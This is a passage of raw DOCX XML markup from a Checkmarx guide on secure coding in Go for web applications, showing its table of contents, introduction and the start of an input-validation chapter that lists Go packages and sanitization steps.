            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>WebSockets</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.10.2</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index10_html" w:tooltip="">
        <w:r>
          <w:t>System Configuration</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.11</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index11_html" w:tooltip="">
        <w:r>
          <w:t>Database Security</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.12</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 12"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_connections_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Connections</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.12.1</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 12"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_authentication_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Authentication</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.12.2</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_parameterized_queries_html" w:tooltip="">
        <w:r>
          <w:t>Parameterized Queries</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.12.3</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_stored_procedures_html" w:tooltip="">
        <w:r>
          <w:t>Stored Procedures</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.12.4</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index12_html" w:tooltip="">
        <w:r>
          <w:t>File Management</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.13</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index13_html" w:tooltip="">
        <w:r>
          <w:t>Memory Management</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.14</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 12"/>
      </w:pPr>
      <w:r>
        <w:t/>
        <w:t>General Coding Practices</w:t>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.15</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_cross_site_request_forgery_html" w:tooltip="">
        <w:r>
          <w:t>Cross-Site Request Forgery</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.15.1</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_regular_expressions_html" w:tooltip="">
        <w:r>
          <w:t>Regular Expressions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.15.2</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_howto_contribute_html" w:tooltip="">
        <w:r>
          <w:t>How To Contribute</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.16</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_final_notes_html" w:tooltip="">
        <w:r>
          <w:t>Final Notes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.17</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="1" w:name="Introduction"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go Language - Web Application Secure Coding Practices is a guide written for anyone who is using the </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Go Programming Language</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and aims to use it for web development.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve">This book is collaborative effort of </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:tooltip="">
        <w:r>
          <w:t>Checkmarx Security Research Team</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> and it follows the </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:tooltip="">
        <w:r>
          <w:t>OWASP Secure Coding Practices - Quick Reference Guide v2 (stable)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>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2" w:name="Why_This_Book"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Why This Book</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>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3" w:name="The_Audience_for_this_Book"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>The Audience for this Book</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>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tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Go tour</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="4" w:name="What_You_Will_Learn"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>What You Will Learn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This book covers the </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>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5" w:name="About_Checkmarx"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>About Checkmarx</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:hyperlink r:id="rId24" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Checkmarx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> is an Application Security software company, whose mission is to provide enterprise organizations with application security testing products and services that empower developers to deliver secure applications. Amongst the company's 1,000 customers are five of the world's top 10 software vendors, four of the top American banks, and many Fortune 500 and government organizations, including SAP, Samsung and Salesforce.com.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For more information about Checkmarx, visit </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>checkmarx.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> or follow us on Twitter: </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>@checkmarx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="6" w:name="About_OWASP_Secure_Coding_Practices"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>About OWASP Secure Coding Practices</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text4"/>
          </w:rPr>
          <w:t>Secure Coding Practices Quick Reference Guide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text4"/>
          </w:rPr>
          <w:t>OWASP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Open Web Application Security Project. It is a "</w:t>
      </w:r>
      <w:r>
        <w:t>technology agnostic set of general software security coding practices, in a comprehensive checklist format, that can be integrated into the development lifecycle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>" (</w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text4"/>
          </w:rPr>
          <w:t>source</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 11"/>
      </w:pPr>
      <w:hyperlink r:id="rId28" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text4"/>
          </w:rPr>
          <w:t>OWASP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>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0"/>
        </w:rPr>
        <w:t>" (</w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text4"/>
          </w:rPr>
          <w:t>source</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>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tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>How To contribute section</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="8" w:name="Input_Validation"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Input Validation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>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30" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>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1" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> ranks as the number 1 vulnerability in the "</w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>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0"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>User Interactivity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Whitelisting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Boundary checking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Character escaping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Numeric validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>File Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Data sources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Cross-system consistency checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Hash totals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Referential integrity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Uniqueness check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Table look up check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Post-validation Actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Enforcement Actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Advisory Action</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Verification Action</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Sanitization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Check for invalid UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Convert single less-than characters (&lt;) to entity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Strip all tags</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Remove line breaks, tabs and extra white space</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Strip octets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>URL request path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="9" w:name="Validation"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Validation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>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0" w:name="User_Interactivity"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>User Interactivity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>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5"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>strconv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> package handles string conversion to other datatypes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:pStyle w:val="Para 09"/>
      </w:pPr>
      <w:hyperlink r:id="rId33" w:tooltip="">
        <w:r>
          <w:t>Atoi</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:pStyle w:val="Para 09"/>
      </w:pPr>
      <w:hyperlink r:id="rId34" w:tooltip="">
        <w:r>
          <w:t>ParseBool</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:pStyle w:val="Para 09"/>
      </w:pPr>
      <w:hyperlink r:id="rId35" w:tooltip="">
        <w:r>
          <w:t>ParseFloat</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:pStyle w:val="Para 09"/>
      </w:pPr>
      <w:hyperlink r:id="rId36" w:tooltip="">
        <w:r>
          <w:t>ParseInt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>strings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> package contains all functions that handle strings and its properties.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:pStyle w:val="Para 09"/>
      </w:pPr>
      <w:hyperlink r:id="rId37" w:tooltip="">
        <w:r>
          <w:t>Trim</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:pStyle w:val="Para 09"/>
      </w:pPr>
      <w:hyperlink r:id="rId38" w:tooltip="">
        <w:r>
          <w:t>ToLower</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:pStyle w:val="Para 09"/>
      </w:pPr>
      <w:hyperlink r:id="rId39" w:tooltip="">
        <w:r>
          <w:t>ToTitle</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:hyperlink r:id="rId40" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text6"/>
          </w:rPr>
          <w:t>regexp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> package support for regular expressions to accommodate custom formats</w:t>
      </w:r>
      <w:hyperlink w:anchor="1__Before_writing_your_own_regular_expression_hav___" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:bookmarkStart w:id="11" w:name="1"/>
          <w:t>1</w:t>
          <w:bookmarkEnd w:id="11"/>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:hyperlink r:id="rId41" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text6"/>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5"/>
        </w:numPr>
        <w:pStyle w:val="Para 09"/>
      </w:pPr>
      <w:hyperlink r:id="rId42" w:tooltip="">
        <w:r>
          <w:t>Valid</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:pStyle w:val="Para 09"/>
      </w:pPr>
      <w:hyperlink r:id="rId43" w:tooltip="">
        <w:r>
          <w:t>ValidRune</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:pStyle w:val="Para 09"/>
      </w:pPr>
      <w:hyperlink r:id="rId44" w:tooltip="">
        <w:r>
          <w:t>ValidString</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Encoding UTF-8 runes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:pStyle w:val="Para 09"/>
      </w:pPr>
      <w:hyperlink r:id="rId45" w:tooltip="">
        <w:r>
          <w:t>EncodeRune</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Decoding UTF-8:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:pStyle w:val="Para 09"/>
      </w:pPr>
      <w:hyperlink r:id="rId46" w:tooltip="">
        <w:r>
          <w:t>DecodeLastRune</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
